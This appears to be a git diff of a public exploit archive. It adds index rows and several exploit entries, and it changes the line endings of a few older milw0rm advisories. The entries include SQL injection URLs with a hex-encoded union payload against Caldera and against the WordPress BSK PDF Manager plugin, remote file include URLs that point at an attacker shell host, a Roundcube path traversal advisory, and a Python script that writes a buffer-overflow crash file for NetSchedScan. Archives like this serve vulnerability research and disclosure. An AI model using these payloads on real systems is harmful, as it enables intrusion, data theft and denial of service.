39175,platforms/multiple/remote/39175.py,"AssistMyTeam Team Helpdesk Multiple Information Disclosure Vulnerabilities",2014-05-05,bhamb,multiple,remote,0 39176,platforms/php/webapps/39176.html,"TOA Cross Site Request Forgery Vulnerability",2014-05-08,"High-Tech Bridge",php,webapps,0 39177,platforms/multiple/dos/39177.py,"VLC Media Player '.wav' File Memory Corruption Vulnerability",2014-05-09,"Aryan Bayaninejad",multiple,dos,0 @@ -35486,7 +35487,10 @@ id,file,description,date,author,platform,type,port 39237,platforms/php/webapps/39237.txt,"WordPress NextGEN Gallery <= 1.9.1 'photocrati_ajax' Arbitrary File Upload Vulnerability",2014-05-19,SANTHO,php,webapps,0 39238,platforms/php/webapps/39238.txt,"AtomCMS SQL Injection and Arbitrary File Upload Vulnerabilities",2014-07-07,"Jagriti Sahu",php,webapps,0 39239,platforms/php/webapps/39239.txt,"xClassified 'ads.php' SQL Injection Vulnerability",2014-07-07,Lazmania61,php,webapps,0 +39240,platforms/php/webapps/39240.txt,"WordPress BSK PDF Manager Plugin 'wp-admin/admin.php' Multiple SQL Injection Vulnerabilities",2014-07-09,"Claudio Viviani",php,webapps,0 +39242,platforms/windows/dos/39242.py,"NetSchedScan 1.0 - Crash PoC",2016-01-15,"Abraham Espinosa",windows,dos,0 39243,platforms/php/webapps/39243.txt,"phpDolphin <= 2.0.5 - Multiple Vulnerabilities",2016-01-15,WhiteCollarGroup,php,webapps,80 39244,platforms/linux/local/39244.txt,"Amanda <= 3.3.1 - amstar Command Injection Local Root",2016-01-15,"Hacker Fantastic",linux,local,0 39245,platforms/php/webapps/39245.txt,"Roundcube 1.1.3 - Path Traversal Vulnerability",2016-01-15,"High-Tech Bridge SA",php,webapps,80 39246,platforms/php/webapps/39246.txt,"mcart.xls Bitrix Module 6.5.2 - SQL Injection Vulnerability",2016-01-15,"High-Tech Bridge SA",php,webapps,80 +39248,platforms/php/webapps/39248.txt,"WordPress BSK PDF Manager Plugin 'wp-admin/admin.php' Multiple SQL Injection Vulnerabilities",2014-07-09,"Claudio Viviani",php,webapps,0 diff --git a/platforms/multiple/remote/705.pl b/platforms/multiple/remote/705.pl index 6f91ab2bd..6c377d2c3 100755 --- a/platforms/multiple/remote/705.pl +++ b/platforms/multiple/remote/705.pl @@ -122,6 +122,6 @@ exit; } else { print $answer; } } } -} - -# milw0rm.com [2004-12-22] +} + +# milw0rm.com [2004-12-22] diff --git a/platforms/php/webapps/2451.txt b/platforms/php/webapps/2451.txt index 82f654608..dc47c1c2c 100755 --- a/platforms/php/webapps/2451.txt +++ b/platforms/php/webapps/2451.txt @@ -1,34 +1,34 @@ -####################################### -+PHP MyWebMin 1.0 Remote File Include -+Advisory #5 -+Product :PHP MyWebMin -+Develop: -+www.josh.ch/joshch/php-tools/phpmywebmin,download.html -+Vulnerable: Remote File Includes -+Risk:High -+Class:Remote -+Discovered:by Kernel-32 -+Contact: kernel-32@linuxmail.org -+Homepage: http://kernel-32.blogspot.com -+Greetz: BeLa ;) -######################################## - -Vulnerable File:window.php -$ordner = opendir("$target"); -?> - -and - -include("$target/preferences.php"); - -if($action != "") -{ -include("$action.php"); -?> - -Examples: -http://site/path/window.php?target=/etc -http://site/path/home.php?target=/home -http://site/path/window.php?action=Shell.php - -# milw0rm.com [2006-09-28] +####################################### ++PHP MyWebMin 1.0 Remote File Include ++Advisory #5 ++Product :PHP MyWebMin ++Develop: ++www.josh.ch/joshch/php-tools/phpmywebmin,download.html ++Vulnerable: Remote File Includes ++Risk:High ++Class:Remote ++Discovered:by Kernel-32 ++Contact: kernel-32@linuxmail.org ++Homepage: http://kernel-32.blogspot.com ++Greetz: BeLa ;) +######################################## + +Vulnerable File:window.php +$ordner = opendir("$target"); +?> + +and + +include("$target/preferences.php"); + +if($action != "") +{ +include("$action.php"); +?> + +Examples: +http://site/path/window.php?target=/etc +http://site/path/home.php?target=/home +http://site/path/window.php?action=Shell.php + +# milw0rm.com [2006-09-28] diff --git a/platforms/php/webapps/2462.txt b/platforms/php/webapps/2462.txt index 0176e98ed..98d818197 100755 --- a/platforms/php/webapps/2462.txt +++ b/platforms/php/webapps/2462.txt @@ -1,30 +1,30 @@ --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -phpMyWebmin 1.0 <= (target) Remote File Include Vulnerability - --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -Discovered by XORON(turkish hacker) - --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -URL: http://www.josh.ch/joshch/joshch/_content_data/phpmywebmin/phpMyWebmin10.zip - --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -Vuln. Code: include("$target/$folder/preferences.php"); - --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -Exploit: /change_preferences2.php?target=http://SH3LL? - /create_file.php?target=http://SH3LL? - /upload_local.php?target=http://SH3LL? - /upload_multi.php?target=http://SH3LL? - --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -Thanx: str0ke, Preddy, Ironfist, Stansar, Kernel-32 ;) - --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -# milw0rm.com [2006-09-30] +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + +phpMyWebmin 1.0 <= (target) Remote File Include Vulnerability + +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + +Discovered by XORON(turkish hacker) + +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + +URL: http://www.josh.ch/joshch/joshch/_content_data/phpmywebmin/phpMyWebmin10.zip + +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + +Vuln. Code: include("$target/$folder/preferences.php"); + +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + +Exploit: /change_preferences2.php?target=http://SH3LL? + /create_file.php?target=http://SH3LL? + /upload_local.php?target=http://SH3LL? + /upload_multi.php?target=http://SH3LL? + +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + +Thanx: str0ke, Preddy, Ironfist, Stansar, Kernel-32 ;) + +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + +# milw0rm.com [2006-09-30] diff --git a/platforms/php/webapps/39174.txt b/platforms/php/webapps/39174.txt new file mode 100755 index 000000000..a4aec6ebe --- /dev/null +++ b/platforms/php/webapps/39174.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/67256/info + +Caldera is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/costview2/printers.php?id_onglet=0&tr=0+union+select+0x3020756E696F6E2073656C656374206E756C6C2C404076657273696F6E2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C2C6E756C6C,null,null,0,null&deb=0 \ No newline at end of file diff --git a/platforms/php/webapps/39240.txt b/platforms/php/webapps/39240.txt new file mode 100755 index 000000000..19bdfb787 --- /dev/null +++ b/platforms/php/webapps/39240.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/68488/info + +BSK PDF Manager plugin for WordPress is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +BSK PDF Manager 1.3.2 is vulnerable; other versions may also be affected. + +http://www.example.com/wp-admin/admin.php?page=bsk-pdf-manager-pdfs&view=edit&pdfid=1 and 1=2 + +http://www.example.com/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1 and 1=2 \ No newline at end of file diff --git a/platforms/php/webapps/39245.txt b/platforms/php/webapps/39245.txt index 5e0f4ca4f..881a59a84 100755 --- a/platforms/php/webapps/39245.txt +++ b/platforms/php/webapps/39245.txt @@ -18,9 +18,13 @@ Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.ht Advisory Details: -High-Tech Bridge Security Research Lab discovered a path traversal vulnerability in a popular webmail client Roundcube. Vulnerability can be exploited to gain access to sensitive information and under certain circumstances to execute arbitrary code and totally compromise the vulnerable server. +High-Tech Bridge Security Research Lab discovered a path traversal vulnerability in a popular webmail client Roundcube. +Vulnerability can be exploited to gain access to sensitive information and under certain circumstances to execute arbitrary code and totally compromise the +vulnerable server. -The vulnerability exists due to insufficient sanitization of "_skin" HTTP POST parameter in "/index.php" script when changing between different skins of the web application. A remote authenticated attacker can use path traversal sequences (e.g. "../../") to load a new skin from arbitrary location on the system, readable by the webserver. +The vulnerability exists due to insufficient sanitization of "_skin" HTTP POST parameter in "/index.php" script when changing between different skins +of the web application. A remote authenticated attacker can use path traversal sequences (e.g. "../../") to load a new skin from arbitrary location on the system, +readable by the webserver. A simple exploit below will send HTTP POST request to vulnerable script and will load a new skin from "/tmp" folder: @@ -44,7 +48,8 @@ A simple exploit below will send HTTP POST request to vulnerable script and will Exploitation of the vulnerability requires valid user credentials and ability to create files on vulnerable host. -Using specially crafted skin for Roundcube, a remote attacker can gain access to potentially sensitive information. The following code in skin files will display database access credentials: +Using specially crafted skin for Roundcube, a remote attacker can gain access to potentially sensitive information. The following code in skin files will +display database access credentials: @@ -52,7 +57,8 @@ In case, when "skin_include_php" parameter is set to true, the attacker will be $config['skin_include_php'] = true; -This vulnerability is difficult to exploit since it requires ability to create files on the web server and a valid Roundcube account. But this situation is very common for shared hosting servers, that host clients' websites on the same server as Roundcube. +This vulnerability is difficult to exploit since it requires ability to create files on the web server and a valid Roundcube account. +But this situation is very common for shared hosting servers, that host clients' websites on the same server as Roundcube. ----------------------------------------------------------------------------------------------- @@ -69,7 +75,8 @@ References: [1] High-Tech Bridge Advisory HTB23283 - https://www.htbridge.com/advisory/HTB23283 - RCE in Roundcube [2] Roundcube - https://roundcube.net/ - Free and Open Source Webmail Software [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. -[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. +[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software +weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- diff --git a/platforms/php/webapps/39248.txt b/platforms/php/webapps/39248.txt new file mode 100755 index 000000000..f137b177d --- /dev/null +++ b/platforms/php/webapps/39248.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/68488/info + +BSK PDF Manager plugin for WordPress is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +BSK PDF Manager 1.3.2 is vulnerable; other versions may also be affected. + +http://www.example.com/wp-admin/admin.php?page=bsk-pdf-manager-pdfs&view=edit&pdfid=1 and 1=2 + +http://www.example.com/wp-admin/admin.php?page=bsk-pdf-manager&view=edit&categoryid=1 and 1=2 \ No newline at end of file diff --git a/platforms/php/webapps/673.cgi b/platforms/php/webapps/673.cgi index 2e4fec599..e1f8a3b7b 100755 --- a/platforms/php/webapps/673.cgi +++ b/platforms/php/webapps/673.cgi @@ -63,6 +63,6 @@ print "[-] EXPLOIT BASARISIZ\r\n"; print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n"; } -print ""; - -# milw0rm.com [2004-12-03] +print ""; + +# milw0rm.com [2004-12-03] diff --git a/platforms/windows/dos/39242.py b/platforms/windows/dos/39242.py new file mode 100755 index 000000000..0ba5870cd --- /dev/null +++ b/platforms/windows/dos/39242.py @@ -0,0 +1,27 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- +# Exploit Title : NetSchedScan v1.0 scan Hostname/IP Field Buffer Overflow Crash PoC +# Discovery by : Abraham Espinosa +# Email : hechoenmexicomx@hotmail.com +# Discovery Date : 14/01/2016 +# Vendor Homepage : http://www.foundstone.com +# Software Link : http://www.mcafee.com/us/downloads/free-tools/netschedscan.aspx# +# Tested Version : 1.0 +# Vulnerability Type : Denial of Service (DoS) Local +# Tested on OS : Windows 8.1 x64 es +# Steps to Produce the Crash: +# 1.- Run python code : python NetSchedScan.py +# 2.- Open NetSchedScan.txt and copy content to clipboard +# 3.- Open NetSchedScan.exe +# 4.- Clic button Ok +# 5.- Paste Clipboard Scan > Hostname/IP +# 6.- Clic on add button (->) +# 7.- Clic button Aceptar +# 8.- Crashed + +buffer = "\x41" * 388 +eip = "\x43" * 4 + +f = open ("NetSchedScan.txt", "w") +f.write(buffer + eip) +f.close() \ No newline at end of file